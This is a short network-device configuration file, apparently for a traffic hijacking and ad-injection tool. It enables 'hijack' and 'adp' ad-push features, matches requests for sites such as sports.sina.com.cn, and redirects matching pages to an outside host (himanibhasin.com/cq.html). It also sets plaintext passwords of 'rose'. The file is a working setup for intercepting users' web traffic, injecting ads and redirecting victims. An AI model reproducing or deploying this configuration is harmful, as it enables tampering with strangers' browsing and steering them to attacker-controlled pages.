!
! Zebra configuration saved from vty
!   2018/01/18 16:09:17
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
interface bussiness add eth1
ad template send single
domain default push
snet default push
adp dmac custom
adp smac custom
adp interval 1
adp switch template pc on
adp switch template mobile off
adp switch on
adp pkt-content eth
ori url add 1 ^sports\.sina\.com\.cn mask 0x1 
ori url add 2 ^wen\.xingsxj\.top mask 0x4 
ori url add 3 ^y\.code\.17tanwan\.com(.*)\.html redir http://himanibhasin.com/cq.html  10
hijack switch on
hijack ip interval 100
hijack ip pkt interval 100
hijack pkt interval 100
hijack ip time interval 0
!
line vty
!
